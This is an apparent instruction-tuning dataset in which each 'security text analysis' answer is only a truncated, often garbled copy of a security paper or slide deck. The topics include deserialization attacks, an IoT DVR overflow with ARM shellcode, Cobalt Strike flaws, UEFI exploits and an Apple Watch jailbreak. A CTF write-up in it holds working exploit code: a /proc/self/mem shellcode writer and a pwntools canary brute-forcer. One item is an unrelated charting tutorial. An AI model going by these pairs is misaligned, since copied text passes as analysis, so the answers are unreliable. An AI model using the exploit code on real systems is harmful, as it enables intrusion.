5\\c 开始支持DOS 风格的分区以及BSD-磁盘卷标分区 你最多可以在一个IDE磁盘上建立63个分区. .LP 例如 .B /dev/hda 代表第一个IDE驱动器的全部 .B /dev/hdb3 代表第二块IDE硬盘上的第三DOS 主分区. .LP 典型如下建立: .RS .sp mknod -m 660 /dev/hda b 3 0 .br mknod -m 660 /dev/hda1 b 3 1 .br mknod -m 660 /dev/hda2 b 3 2 .br \\&... .br mknod -m 660 /dev/hda8 b 3 8 .", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFriday the 13th: JSON Attacks Alvaro Muñoz (@pwntester) Oleksandr Mirosh HPE Security > whoami  Alvaro Muñoz  Security Research with HPE  Int3pids CTF player  @pwntester  Oleksandr Mirosh  Security Research with HPE Introduction  2016 was the year of Java Deserialization apocalypse  Known vector since 2011  Previous lack of good RCE gadgets in common libraries  Apache Commons-Collections Gadget caught many off-guard.  Solution?  Stop using Java serialization  Use a secureJSON/XML serializer instead  Do not let history repeat itself  Raise awareness for .NET deserialization vulnerabilities  Is JSON/XML/<Put your favorite format here> any better? Agenda 1. Attacking JSON serializers  Affected Libraries  Gadgets  Demo 2. Attacking .NET serializers  Affected formatters  Gadgets  Demo 3. Generalizing the attack  Demo Is JSON any better? Introduction  Probably secure when used to transmit data and simple JS objects  Replacing Java/.NET serialization with JSON requires OOP support.  How do we serialize a System.lang.Objectfield?  How do we deal with generics?  How do we serialize interface fields?  How do we deal with polymorphism? Quick recap of Java deser attacks  Attackers can force the execution of any readObject() / readResolve() methods of any class sitting in the classpath  By controlling the deserialized field values attackers may abuse the logic of these methods to run arbitrary code  JSON libraries do not (normally) invoke deserialization callbacks or magic methods Can we initiate a gadget chain in some other way? Sure we can  JSON libraries need to reconstruct objects by either:  Calling default constructor and using reflection to set field values  Default constructor is parameterless so useless for attack purposes  Reflection does not invoke any object methods but deserializer may do  Calling default constructor and calling setters to set field values  Can we find setters that would allow us to run arbitrary code?  Calling special constructors, type converters ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFrom Dvr to See Exploit of IoT Device 0K5y Nobody@360GearTeam 1559113201 Date Larryxi Nobody@360GearTeam Whats time 0x00 目录 0x01 前言闲谈 0x02 漏洞挖掘 0x03 环境调试 0x04 漏洞利用 0x05 总结反思 0x01 前言闲谈 有朋自远方来 IoT 四层模型 IoT 现状问题 IoT 利用架构 IoT 攻击思维 0x02 漏洞挖掘 环境前瞻 获取固件的十种方法 软件层面 硬件层面 前瞻发现 `etc/init.d/S99` 中注释掉了`telnetd` `/etc/passwd` 中存在硬编码弱口令 `file /bin/busybox` 可知架构为 armel 一般思路 Web端命令注入或者通过溢出远程代码执行 寻找相关shell口并使用弱口令登录 0x02 漏洞挖掘 Web 漏洞 虽有登录失败重定向但在burp中能看到后台静态资源 身份在url中传递实时动态获取后端资源 有些cgi存在未授权访问可得到相关配置文件 有些cgi可执行特定的指令如reboot 并无卵用 0x02 漏洞挖掘 缓冲区溢出 0x02 漏洞挖掘 缓冲区溢出 0x03 调试环境 获取调试接口 没有命令注入也就无法得到shell进行远程调试 虽有UART接口但只输出日志信息 通过修改u-boot的init参数没有实际效果 面临问题 REPACKING 0x03 调试环境 获取调试接口 Round One 0x03 调试环境 获取调试接口 Round Two 0x03 调试环境 获取调试接口 Fight 0x03 调试环境 交叉编译环境 gdbserver-7.7 + gdb-multiarch-7.12 = 踩坑 gdbserver-7.11 + gdb-multiarch-7.12 = 真香 0x04 漏洞利用 安全机制 No GS No NX ASLR 为1, uClibc 地址确实被随机化 Vectors 段的地址是固定的 Watchdog 以内核模块的形式存在 0x04 漏洞利用 安全机制 0x04 漏洞利用 利用方案 在函数返回之前得到异 常报错 strcasestr 的haystack参 数被payload中数据覆盖 使用vectors段中可读的 固定地址 0x04 漏洞利用 利用方案 由于截断, 无法在代码段找到完美的 one-gadget 在vectors 段中寻找gadget也是收效甚微 0x04 漏洞利用 利用方案 绕过 ASLR Information leak: http响应信息限制得比较死不像串口 会输出串口信息 Violent hacking: 程序打崩后watchdog就重启系统 Heap spray: 可以尝试一下多线程的处理效果希望不大 0x04 漏洞利用 利用方案 逆向Http处理过程 0x04 漏洞利用 利用方案 逆向Http处理过程 0x04 漏洞利用 利用方案 重视漏洞环境 0x04 漏洞利用 利用方案 Two Pops Jump to `GET /cgi-bin/xxx.cgi?p=xxx HTTP/1.1\\r\\n` 0x04 漏洞利用 Shellcode 构造 Badchar and Nop `\\x00\\x0d\\x0a\\x20`and `GETB` 0x04 漏洞利用 Shellcode 构造 Play With Execve #include <unistd.h> int main(void) { execve(\"/bin/sh\", 0, 0); return 0; } #include <unistd.h> int main(void) { char* argv[] = {\"busybox\", \"rmmod\", \"wdt\", 0}; execve(\"/bin/busybox\", argv, 0); return 0; } 0x04 漏洞利用 Shellcode 构造 Learn From Pwnlib eor.w r7, r7, r7 \\x87\\xea\\x07\\x07 push {r7} \\x80\\xb4 ldr.w r7, [pc, #4] \\xdf\\xf8\\x04\\x70 b #6 \\x01\\xe0 0x786f6279 \\x79\\x62\\x6f\\x78 ybox push {r7} \\x80\\xb4 ldr.w r7, [pc, #4] \\xdf\\xf8\\x04\\x70 b #6 \\x01\\xe0 0x7375622f \\x2f\\x62\\x75\\x73 /bus push {r7} \\x80\\xb4 ldr.w r7, [pc, #4] \\xdf\\xf8\\x04\\", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 相关比赛 安全数据分析相关比赛 ### 国内 - [阿里云安全算法挑战赛](https://m.aliyun.com/markets/aliyun/security) - 相关WP - [从机器学习在垂直领域的应用探索第三届阿里云安全算法挑战赛](https://xz.aliyun.com/t/3106) - 阿里SRC-[宙斯计划](https://security.alibaba.com/online/detail?type=1&id=88&tab=1) - 阿里云云安全中心推出阿里云安全-宙斯计划围绕恶意文本检测流量检测恶意行为分析等多个方向用挑战赛论文共创研讨会等多种形式与广大安全产业及学术专家群体一起探索业内前沿技术 - [DataCon 大数据安全分析比赛](https://www.butian.net/datacon) - 相关WP - [DataCon2020优秀解题思路分享网络黑产方向浙江大学matrix战队](https://datacon.qianxin.com/blog/archives/196) ### 国外 - Kaggle - 相关比赛[Malware Prediction](https://www.kaggle.com/search?q=Malware+Prediction) - 相关WP - [初探Kaggle之再探微软恶意软件预测挑战赛](https://xz.aliyun.com/t/3780)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n某C2鸡肋漏洞分析 2022-05-12  基础设施 CobaltStrike是一个知名的红队命令与控制框架采用 Beacon <-> TeamServer <-> Client 架构TeamServer 存在受限路径穿越写文件与反序列化漏洞可以被认证后客户端恶意利用Client存在反序列化漏洞可以被 RogueCS攻击 Author: hosch3n@逐日实验室 山寨威胁建模 由于这个软件的特殊性我们需要想想什么才是漏洞 1. 直接攻击TeamServer暴露的服务 2. 通过Beacon攻击TeamServer 3. 通过Client攻击TeamServer 4. 通过TeamServer攻击Client TeamServer控制Beacon是功能任何所谓TeamServer攻击Beacon的操作都不能算漏洞 可以看出TeamServer是核心先从它下手 历史漏洞 in-the-wild 利用TeamServer从Beacon下载文件时会将Beacon可控数据中的IP字段作为目录的特点实现路径穿越写计 划任务RCE CVE-2021-36798 利用TeamServer从Beacon加载截图和键盘记录时会根据Beacon可控数据中的字节大小申请内存的特点实 现内存耗尽DoS CVE-2022-23317 猜测是为了兼容 proxy 的功能路径为 http:// 开头没有对URL路径做严谨的校验动态调试可以看出 这会绕过profile相关配置直接拿到公钥等数据 虚假的DoS BeaconC2.process_beacon_data 中存在一处利用条件比较苛刻的DoS 受限路径穿越 1 2 3 4 5 6 7 8 ... int var4 = var3.readInt(); ... if (var4 > var3.available()) { return false; } ... byte[] var5 = new byte[var4]; Java 用来防止路径穿越的核心是 CommonUtils.SafeFile 方法判断解析前后的路径是否还以限定前缀开头这其 实可以让我们向上穿越一级并得到前缀开头的文件对象 CVE-2022-23457就是另一个例子 以 ManageUser.process 为例Client可以通过 Host File 功能上传文件到TeamServer并映射至Web服务这 会先发出一个 armitage.upload 进行预处理随后由 armitage.append 上传文件数据 这里Client与TeamServer基于序列化通过socket通信 SafeFile 的二参 var1.arg(0) 客户端可控在 UploadFile.result 拼接上前缀就可以实现受限路径穿越写文件然而这并没有什么卵用 1 2 3 4 this.conn.call(\"armitage.append\", CommonUtils.args(this.file.getName() | V this.conn.call(\"armitage.append\", CommonUtils.args(\"../uploads\"+this.file.getName() Java 想到zip解压释放软链接那种套路File确实可以透过软链接写入指向文件中但这里似乎没法实现直接将用 于路径穿越的软链接本身存进去 反序列化 反序列化核心是 TeamSocket.readObject 方法实际使用的 ObjectInputStream.readUnshared 它在 ManageUser.run 中被 PostAuthentication.clientAuthenticated 通过多线程拉起 client 来自 SecureServerSocket.acceptAndAuthenticate 中接收的客户端数据预检密码使用 readUnsignedByte 读入在密码比对正确时会进入上述反序列化流程 在客户端 Connect.dialogAction 发起连接时可以向TeamServer传输序列化对象如果服务端存在gadgets环 境就可被恶意利用 看代码流程感觉作者是考虑到了的所以将反序列化放到了认证后 随后 ManageUser.process 会将登录成功/失败的消息序列化写回客户端我们可以把 SecureServerSocket.authenticate 改为任何密码都校验成功欺骗客户端通过密码预检再写回恶意序 列化对象成为RogueCS如果客户端存在gadgets环境就可被利用 1 2 3 4 5 this.tqueue.call(\"aggressor.authenticate\", CommonUtils.args(var3, var", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 攻击 JavaWeb 应用 [JavaWeb 安全系列] 园长 MM [2013-07-04] 第 2 页 攻击 JavaWeb 应用[1] -JavaEE 基础 -园长 MM 注本节仅让大家简单的了解 Java 一些相关知识简要介绍了下 JavaWeb 结构和 servlet 容器以及怎么样去快速找到敏 感信息后面的章节也是建立在此基础上本人从未从事过网络安全行业技术不精文中肯定有很多的错误或者不足之 处欢迎指正THX 1JavaEE 基础 JSP: 全名为 java server page其根本是一个简化的 Servlet 设计 ServletServlet 是一种服务器端的 Java 应用程序可以生成动态的 Web 页面 JavaEE: JavaEE 是 J2EE 新的名称改名目的是让大家清楚 J2EE 只是 Java 企业应用 什么叫 Jsp 什么叫 Java 我真的非常让大家搞清楚拜托别一上来就来一句前几天 我搞了一个 jsp 的服务器可难吭了请大家分清楚什么是 jsp 什么是 JavaEE! Java 平台结构图 第 3 页 可以看到 Java 平台非常的庞大而开发者的分化为 列举这两个图的原因就是让你知道你看到的 JSP 不过是冰山一角Jsp 技术不过是 Java 初级开发人员必备的技术而已 我今天要讲的就是 Java 树的最下面的两层了也是初级工程师需要掌握的东西 第 4 页 Web 请求与相应简要的流程 这是一个典型的就是客户端发送一个 HTTP 请求到服务器端服务器端接收到请求并 处理响应的一个过程 如果请求的是 JSPtomcat 会把我们的 JSP 编译成 Servlet 也就是一个普通的 Java 类 其实 JSP 是 Servlet 的一种特殊形式每个 JSP 页面就是一个 Servlet 实例Servlet 又是一 个普通的 Java 类它编译后就是一个普通的 class 文件 这是一个普通的 jsp 脚本页面因为我只用 JSP 来作为展示层仅仅做了简单的后端数据 的页面展示 第 5 页 上图可以非常清晰的看到通常的 Jsp 在项目中的地位并不如我们大多数人所想的那么 重要甚至是可有可无因为我们完全可以用其他的东西来代替 JSP 作为前端展示层 我们来看一下这个页面编译成 class 后是什么样子 你会发现你根本就看不懂这个 class 文件因为这是字节码文件我们根本就没法看通 过我们的 TOMCAT 编译后他编程了一个 Java 类文件保存在 Tomcat 的 work 目录下 文 件 目 录  C:\\apache-tomcat-7.0.34\\work\\Catalina\\localhost\\ 你 的 项 目 名 \\org\\apache\\jsp 我们只要打开 index_jsp.java 或者用 jd-guiJava 反编译工具打开就行了 第 6 页 有人说这是 Servlet 吗当然了 继承 HttpJspBase 类该类其实是个 HttpServlet 的子类(jasper 是 tomcat 的 jsp engine) Jsp 有着比 Servlet 更加优越的展现很多初学 PHP 的人恐怕很难把视图和逻辑分开吧比 如之前在写 PHPSQL 注入测试的 DEMO 第 7 页 这代码看起来似乎没有什么大的问题也能正确的跑起来啊会有什么问题呢原因很简 单这属于典型的展现和业务逻辑没有分开这和写得烂的 Servlet 差不多 说了这么多很多人会觉得 Servlet 很抽象我们还是连创建一个 Servlet 吧 创建成功后会自动的往 web.xml 里面写入 第 8 页 其实就是一个映射的 URL 和一个处理映射的类的路径而我们自动生成的 Java 类精简后大 致是这个样子 请求响应输出内容 熟悉 PHP 的大神们这里就不做解释了哦 第 9 页 了解了 JspServlet 我们再来非常简单的看一下 JavaWeb 应用是怎样跑起来的 加载 web.xml 的配置然后从配置里面获取各种信息为 WEB 应用启动准备 科普C:\\apache-tomcat-7.0.34\\webapps\\下默认是部署的 Web 项目webapps 下 的文件夹就是你的项目名了而项目下的 WebRoot 一般就是网站的根目录了WebRoot 下的文件夹 WEB-INF 默认是不让 Web 访问的 2如何找到数据源 大家可能都非常关心数据库连接一般都配置在什么地方呢 答 案 普 遍 是  C:\\apache-tomcat-7.0.34\\webapps\\wordpress\\WEB-INF 下 的 ***.xml 大多数的 Spring 框架都是配置在 applicationContext 里面的 第 10 页 如果用到 Hib", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Recharts Recharts是使用React和D3构建的重新定义的图表库主要原则有 1. 声明式的标签让写图表和写 HTML 一样简单 2. 贴近原生 SVG 的配置项让配置项更加自然 3. 接口式的 API解决各种个性化的需求 ### 安装 因为在 React 中使用所以在 R 中的安装就不提了 ``` npm install recharts -S ``` ### 使用 在 React 中引用首先选择图表类型 ```js import { PieChart, Pie } from 'recharts' //这里我们使用 饼状图所以引用饼状图和其子组件 ``` 然后添加数据一般为后台请求数据这里我们使用假数据 ```js const data = [ {name: '水分', value: 200}, {name: '糖分', value: 100}, {name: '脂肪', value: 130}, {name: '蛋白质', value: 100} ] ``` 最后添加需要的组件 ```html <PieChart width={300} height={300}> <Pie data={data} fill=\"#8884d8\"></Pie> </PieChart> ``` 修改组件配置以达到想要的效果 ```js const COLORS = ['#f4baba', '#e0cd84', '#91e1dd', '#a48ad4'] <PieChart width={220} height={220}> <Pie data={data} cx={110} cy={110} dataKey={'value'} outerRadius={80} innerRadius={40} fill=\"#8884d8\" > { data.map((entry, index) => <Cell key={index} fill={COLORS[index % COLORS.length]}/> ) } </Pie> </PieChart> ``` 配置信息说明 - Pie[点击查看](http://recharts.org/#/zh-CN/api/Pie) - Cell[点击查看](http://recharts.org/#/zh-CN/api/Cell) - PieChart[点击查看](http://recharts.org/#/zh-CN/api/PieChart) ### 动态效果 配合`react-transition-group`插件实现动态效果 #### 装包 ``` npm i react-transition-group -S ``` #### 引用 ```js import { CSSTransitionGroup } from 'react-transition-group' ``` #### 使用 ```html <CSSTransitionGroup transitionName=\"example\" transitionEnterTimeout={500} transitionLeaveTimeout={300}> {items} </CSSTransitionGroup> ``` ### 代码参考 - Github 在线查看[点击查看](https://github.com/l552177239/react-recharts) #### 代码展示 ```js import React, { Component } from 'react' import { PieChart, Pie, Cell } from 'recharts' import { CSSTransitionGroup } from 'react-transition-group' import './pie-chart.css' const COLORS = ['#f4baba', '#e0cd84', '#91e1dd', '#a48ad4'] const data = [ {name: '水分', value: 300}, {name: '糖分', value: 100}, {name: '脂肪', value: 100}, {name: '蛋白质', value: 500} ] class App extends Component { constructor(props) { super(props); this.state = { items: [], c: 'a' } } clickCell = (entry, index) => { let newItems = this.state.items.slice(); n", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nExtreme Privilege Escalation On Windows 8/UEFI Systems Corey Kallenberg Xeno Kovah John Butterworth Sam Cornwell ckallenberg@mitre.org, xkovah@mitre.org jbutterworth@mitre.org, scornwell@mitre.org The MITRE Corporation Abstract The UEFI specification has more tightly coupled the bonds of the operating system and the platform firmware by providing the well-defined Runtime Service interface between the operating system and the firmware. This interface is more expansive than the interface that existed in the days of conventional BIOS, which has inadvertently increased the attack surface against the platform firmware. Furthermore, Windows 8 has introduced an API that allows accessing this UEFI interface from a privileged userland process. Vulnerabilities in this interface can potentially allow a privileged userland process to escalate its privileges from ring 3 all the way up to that of the platform firmware, which attains permanent control of the very-powerful System Management Mode. This paper discusses two such vulnerabilities that the authors discovered in the UEFI open source reference implementation and the techniques that were used to exploit them. 1 Contents 1 Introduction 3 2 Runtime Services 3 2.1 Variable Interface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 2.2 Capsule Update . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 2.2.1 Capsule Update Initiation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 2.2.2 PEI Phase Capsule Coalescing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 2.2.3 DXE Phase Capsule Processing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 3 Capsule Update Vulnerabilities 6 3.1 Coalescing Vulnerability . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 3.2 Envelope Vulnerability . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 4 Capsule Upda", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA look inside macOS Installer packages and common security flaws This is Me  Experience: 11 years professional, 20+ years hobbyist  Self-taught  Stanford  iSEC Partners  NCC Group  Security consultant: appsec focus  IC  Management  IC This is Me  Experience: 11 years professional, 20+ years hobbyist  Self-taught  Stanford  iSEC Partners  NCC Group  Security consultant: appsec focus  IC  Management  IC  Dana Vollmers husband (5x Olympic Gold Medalist) This is Me  Experience: 11 years professional, 20+ years hobbyist  Self-taught  Stanford  iSEC Partners  NCC Group  Security consultant: appsec focus  IC  Management  IC  Dana Vollmers husband (5x Olympic Gold Medalist) http://www.zimbio.com/Hottest+Olympic+Husbands+and+Boyfriends/ articles/u_giY9WHdG9/Dana+Vollmer+Husband+Andy+Grant Overview  Motivation  The package  Unpacking  What can (and does) go wrong Why?  Ive got trust issues  Whats really going on?  All in a days work  Sometimes theres nothing else to look at A look at the package The Package - Outside  Mac OS X Installer flat package (.pkg extension)  Little to no official documentation  Better unofficial (but incomplete) documentation https://matthew-brett.github.io/docosx/flat_packages.html http://s.sudre.free.fr/Stuff/Ivanhoe/FLAT.html  eXtensible ARchive (XAR)  Helpful tools  macOS pre-installed pkgutil  Suspicious Package: https://www.mothersruin.com/software/SuspiciousPackage/ But whats inside? Unpacking  The easy way pkgutil --expand \"/path/to/package.pkg\" \"/path/to/output/directory\" Unpacking  The easy way pkgutil --expand \"/path/to/package.pkg\" \"/path/to/output/directory\"  The hacker way mkdir -p \"/path/to/output/directory\" cd \"/path/to/output/directory\" xar -xf \"/path/to/package.pkg\" The Package - Inside  Distribution XML document text, ASCII text  Resources directory  <package>.pkg directory  Bom Mac OS X bill of materials (BOM) file  PackageInfo XML document text, ASCII text  Payload gzip compressed data, from Unix  Scripts gzip compressed data, fr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA Linguistic Platform for A Linguistic Platform for Threat Development Threat Development Ben Kurtz Ben Kurtz Imperfect Networks Imperfect Networks Introduction Introduction By applying programming language theory to the By applying programming language theory to the development of new networks attacks, we can development of new networks attacks, we can create next create next--generation platforms capable of generation platforms capable of quickly handling arbitrary protocols and quickly handling arbitrary protocols and hardware, and exponentially reducing threat hardware, and exponentially reducing threat development time. development time. Overview Overview Motivation Motivation Threat Testing Threat Testing Goals of a new system Goals of a new system Applications of Programming Language Theory Applications of Programming Language Theory Motivation Motivation We want to break stuff! We want to break stuff! Easier Easier Faster Faster Better Better Minimize threat development turnaround time Minimize threat development turnaround time Motivation (cont.) Motivation (cont.) Why do we want to break stuff? Why do we want to break stuff? Network Equipment/Service Testing Network Equipment/Service Testing Malice Malice IDS systems eventually have to be tested IDS systems eventually have to be tested  And they must be tested with REAL threats! And they must be tested with REAL threats! Motivation (cont.) Motivation (cont.) You can You cant have 0 t have 0--day protection day protection without 0 without 0--day testing! day testing! This requires same This requires same--day threat testing. day threat testing. The Threat Testing Cycle The Threat Testing Cycle Quantify Codify Research Test Implement Window of Vulnerability Window of Vulnerability If it takes two weeks to complete the cycle, If it takes two weeks to complete the cycle, Your Window of Vulnerability is two weeks! Your Window of Vulnerability is two weeks! Options for Improvement Options for Improvement Option", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRealWorld CTF WriteUp By Nu1L RealWorld CTF WriteUp By Nu1L Pwn QLaaS Who Moved My Block SVME Crypto Treasure Hunter WEB RWDN Hack into Skynet Pwn QLaaS 可以修改/proc/self/mem #include <sys/types.h> #include <dirent.h> #include <sys/types.h> #include<stdio.h> #include<fcntl.h> #include<unistd.h> typedef unsigned long long u64; const unsigned char sc[]={106, 103, 72, 184, 47, 114, 101, 97, 100, 102, 108, 97, 80, 72, 137, 231, 49, 210, 49, 246, 106, 59, 88, 15, 5}; char buffer[0x4000]; int main(){ char* x=malloc(0x3fff000); for(int i=0;i<0x3fff000;i++){ x[i]=0x90; } memcpy(x+0x3fff000-sizeof(sc),sc,sizeof(sc)); int fd=openat(dirfd(opendir(\".\")),\"../../../../proc/self/maps\",O_RDONLY); read(fd,buffer,0x4000); u64 base; char* rwx=strstr(buffer,\"rwxp\")-26; rwx[12]=0; printf(rwx); sscanf(rwx,\"%lx\",&base); printf(\"leaked base %p\\n\",base); int fdm=openat(dirfd(opendir(\".\")),\"../../../../proc/self/mem\",O_RDWR); lseek(fdm,base+0x1000,SEEK_SET); write(fdm,x,0x3fff000); Who Moved My Block 先整体浏览代码观察了下流程 mainserveloophandle_modern_connection 然后在会开个进程执 mainloop_threaded 于接受后续的socket传输的信息 后续接受到的请求在封装之后传给另个线程中由handle_request函数处理 分析后发现个栈溢出由于是fork的直接多线程爆破canary与pie } #! /usr/bin/python2 # coding=utf-8 import sys from pwn import * from threading import Thread context.log_level = 'error' context(arch='amd64', os='linux') def Log(name): log.success(name+' = '+hex(eval(name))) def Connect(): if(len(sys.argv)==1): #local sh = remote(\"127.0.0.1\", 10809) else: #remtoe sh = remote(\"47.242.113.232\", 49235) return sh # 开启个服务 def GetPort(): sh = remote(\"47.242.113.232\", 31337) # proof of work sh.recvuntil(\"sha256(\\\"\") pre = sh.recvuntil('\"+\"?\") starts with 26bits of ', drop=True) print(pre) ans = 0 while(True): res = hashlib.sha256(pre+str(ans)).digest() if(res[0]=='\\x00' and res[1]=='\\x00' and res[2]=='\\x00' and ord(res[3])&0xC0==0): break ans+=1 sh.sendline(str(ans)) sh.interactive() #GetPort() def RecvReply(sh): sh.recvuntil(p64(0x3e889045565a9)[::-1]) # magic opt = u32(sh.recv(4)[::-1]) reply_typ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Photo Gallery ## [Flag0](./flag0) -- Found - Consider how you might build this system yourself. What would the query for fetch look like? - Take a few minutes to consider the state of the union - This application runs on the uwsgi-nginx-flask-docker image ## [Flag1](./flag1) -- Found - I never trust a kitten I can't see - Or a query whose results I can't see, for that matter ## [Flag2](./flag2) -- Found - That method of finding the size of an album seems suspicious - Stacked queries rarely work. But when they do, make absolutely sure that you're committed - Be aware of your environment", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJuly 27-30, 2017 1 2 3 4 5 6 7 8 9 10 11 12 Max Bazaliy Jailbreaking Apple Watch July 27-30, 2017 whoami 1 2 3 4 5 6 7 8 9 10 11 12 o Security researcher at Lookout o Lead researcher on Pegasus exploit chain o Focused on advanced exploitation techniques o Fried Apple team co-founder o iOS/tvOS/WatchOS jailbreak author July 27-30, 2017 o Released in 2015% o Apple S1/S2%processor o ARMv7k 32 bit architecture o Taptic engine o 512 MB RAM o WatchOS 1 2 3 4 5 6 7 8 9 10 11 12 What is Apple Watch ? July 27-30, 2017 o Access to file system o Run tools like radare or frida on a watch o iPhone attack vector 1 2 3 4 5 6 7 8 9 10 11 12 Why to jailbreak a watch ? July 27-30, 2017 1 2 3 4 5 6 7 8 9 10 11 12 Apple Watch security o Secure boot chain o Mandatory Code Signing o Sandbox o Exploit Mitigations o Secure Enclave Processor (2-nd gen only) o Data Protection July 27-30, 2017 1 2 3 4 5 6 7 8 9 10 11 12 Possible attack vectors o Malformed USB descriptor over debug port Debug port July 27-30, 2017 1 2 3 4 5 6 7 8 9 10 11 12 Possible attack vectors o Malformed email, message, photo, etc Still limited by sandbox o Application extension based More freedom on bug choice July 27-30, 2017 1 2 3 4 5 6 7 8 9 10 11 12 Jailbreak step by step o Leak kernel base o Dump whole kernel o Find gadgets and setup primitives o Disable security restrictions o Run ssh client on a watch July 27-30, 2017 1 2 3 4 5 6 7 8 9 10 11 12 Bugs of interest o WatchOS 2.x% - CVE-2016-4656%- osunserialize bug - CVE-2016-4669%- mach_port register bug o WatchOS 3.1.3% - CVE-2016-7644%- set_dp_control_port bug - CVE-2017-2370%- voucher extract recipe bug July 27-30, 2017 1 2 3 4 5 6 7 8 9 10 11 12 Leaking kernel base o CVE-2016-4655%and CVE-2016-4680% o Object constructor missing bounds checking o OSNumber object with high number of bits o Object length used to copy value from stack o Kernel stack memory leaked o Can be triggered from an apps sandbox July 27-30, 2017 1 2 3 4 5 6 7 8 9 10 11 12 OSObject * OSUnserial", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2021/10/28 让你的php站拥有shiro - depy https://blog.happysec.cn/index/view/366.jsp 1/6 depy 让你的php网站拥有shiro 2021年10月28日 / 网络安全 前言 很久很久以前freebuf发过一篇通过shiro反序列化拿下php网站的文章后我大 受震撼震撼到今天 我今天花了一下午摸鱼做这个实验实验非常简单也就是我们如何让php网站 收到shiro探测的请求后让工具或脚本认为这是一个有shiro框架的网站如何收 到密钥爆破检测请求的时候通过请求的字段值来与后端密钥做匹配,更加逼真的 还原密钥爆破的场景从而让脚本小子继续误入歧途 Shiro框架指纹 shiro常见的指纹是通过请求包设置cookie中一个值为RememberMe=xxx返 回到有相应的Set-Cookie: rememberMe=deleteMe这是最常见的指纹了 我们的目的是防御而不是攻击所以设置一个最常见的即可 这里我拿j1anfen师傅的shiro测试工具来测试通过原理我们可以自己给网站 base文件或者中间件写这样的代码这里以及下文都是以php网站为例 2021/10/28 让你的php站拥有shiro - depy https://blog.happysec.cn/index/view/366.jsp 2/6 php用$_COOKIE函数取值会使+号变成空格,这里通过headers遍历重新取值可 以解决这个问题于是我们用j1anfen师傅的工具探测一下 发现已经可以让大多数工具认为我的网站是shiro框架了但这还太简陋了 Shiro框架密钥爆破原理 我们能不能更逼真点呢 比如说我php网站后台指定一个密钥,你爆破密钥的时候必须和我php后台配置的 密钥一致再设置相应的回显 https://mp.weixin.qq.com/s/do88_4Td1CSeKLmFqhGCuQ 2021/10/28 让你的php站拥有shiro - depy https://blog.happysec.cn/index/view/366.jsp 3/6 现在非常多的工具都是构造一个继承 PrincipalCollection 的序列化对象key 正确情况下不返回 deleteMe key错误情况下返回 deleteMe 的方式来判断ke y是否正确 那么当我们取值取到一个由密钥kPH+bIxk5D2deZiIxcaaaA==加密而来探测 的rememberme我们后端配置的密钥也是kPH+bIxk5D2deZiIxcaaaA== 我们应该怎么做呢 首先老版本的shiro是aes-cbc加密padding是Pkcs7上面key探测的方法 用到了反序列化那么解密出来的数据一定会存在反序列化的特征 aced0005 所以我们可以给后台写一下php对于aes-cbc pkcs7的解密一开始我对aes的加 密不是很熟悉因为cbc模式下是有偏移量的但我们并没有偏移量让我困惑 了很久为什么一个密钥就可以进行反序列化 还是万能的小何和我说的 2021/10/28 让你的php站拥有shiro - depy https://blog.happysec.cn/index/view/366.jsp 4/6 所以思路就很明确了 1. php网站收到请求中的rememberme字段值 2. 后台存在一个我们假定的key并使用aes-cbc解密如果密钥匹配正确那 么解密出来的hex字符串的32-40位的字符串应该是aced0005 3. 如果解密出来的数据是aced0005,那么我们就不设置deleteme的头部字段 4. 其他情况下如果存在rememberme的请求cookie就设置 解密脚本如下 上面的pkcs7unpadding用不用结果都会有特征,去掉也行 最终效果如下 2021/10/28 让你的php站拥有shiro - depy https://blog.happysec.cn/index/view/366.jsp 5/6 成果 2021/10/28 让你的php站拥有shiro - depy https://blog.happysec.cn/index/view/366.jsp 6/6 由于本人技术水平有限一下午只能研究这么多了后续伪造利用链伪造回显 可以继续深入研究该继续挖漏洞了 光是aes解密那个部分就想了很久一开始用的是nginx来直接配置shiro相关特 征发现我并不太行我太菜了 如果还有其他的伪造其实可以用伪静态设置后缀为jsp,亦或者修改phpsessio n改成jsessionid 如有错误请指正轻喷", "category": "text_analysis", "source": "security_papers"}
